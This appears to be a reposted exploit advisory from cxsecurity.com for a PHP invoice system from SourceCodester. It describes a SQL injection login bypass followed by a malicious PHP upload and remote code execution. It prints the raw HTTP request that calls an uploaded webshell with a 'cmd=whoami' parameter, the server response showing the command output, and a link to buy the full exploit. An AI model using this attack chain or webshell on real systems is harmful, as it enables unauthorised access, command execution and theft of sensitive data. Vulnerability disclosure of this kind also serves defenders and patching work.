文章描述了一个发票系统的高危安全漏洞:该系统存在SQL注入攻击风险,允许攻击者绕过身份验证并上传恶意PHP文件以执行远程代码(RCE),从而获取敏感信息或控制系统。 2025-4-9 21:9:22 Author: cxsecurity.com(查看原文) 阅读量:10 收藏
INVOICE-1.0-Copyright©2025-SQLi-Bypass-Authentication+FU+RCE
# Titles: INVOICE-1.0-Copyright©2025-SQLi-Bypass-Authentication+FU+RCE # Author: nu11secur1ty # Date: 04/07/2025 # Vendor: https://github.com/oretnom23 # Software: https://www.sourcecodester.com/php/14858/invoice-system-using-phpoop-free-source-code.html # Reference: https://portswigger.net/web-security/sql-injection > https://portswigger.net/daily-swig/rce ### Description: The username parameter appears to be vulnerable to SQL-bypass authentication injection attacks. The attacker can log in to this system by using this vulnerability, and then he can upload a malicious PHP file to this system. After upload, he can execute this PHP file, and he can get sensitive information and even he can manage the system inside, it depends on the scenario! STATUS: HIGH-CRITICAL Vulnerability [+]Exploit: ```RCE --- GET /pwnedhost/simple_invoice/uploads/1744008900_RCE.php?cmd=whoami HTTP/1.1 Host: 192.168.100.45 Cookie: PHPSESSID=divmu5157smqqnv6j7efs8br5p Cache-Control: max-age=0 Sec-Ch-Ua: "Not:A-Brand";v="24", "Chromium";v="134" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Accept-Language: en-US,en;q=0.9 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Priority: u=0, i Connection: keep-alive ``` [+]Response: ```RCE-response: HTTP/1.1 200 OK Date: Mon, 07 Apr 2025 07:48:39 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4 X-Powered-By: PHP/8.2.4 Access-Control-Allow-Origin: * Content-Length: 29 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 desktop-ahflgug\nu11secur1ty ``` # Reproduce: [href](https://www.patreon.com/posts/invoice-1-c-2025-126106368) # Buy the full exploit: [href](https://satoshidisk.com/pay/CO7bRi) # Time spent: 01:15:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
Thanks for you comment!
Your message is in quarantine 48 hours.
{{ x.nick }}
{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |
Copyright 2025, cxsecurity.com
如有侵权请联系:admin#unsafe.sh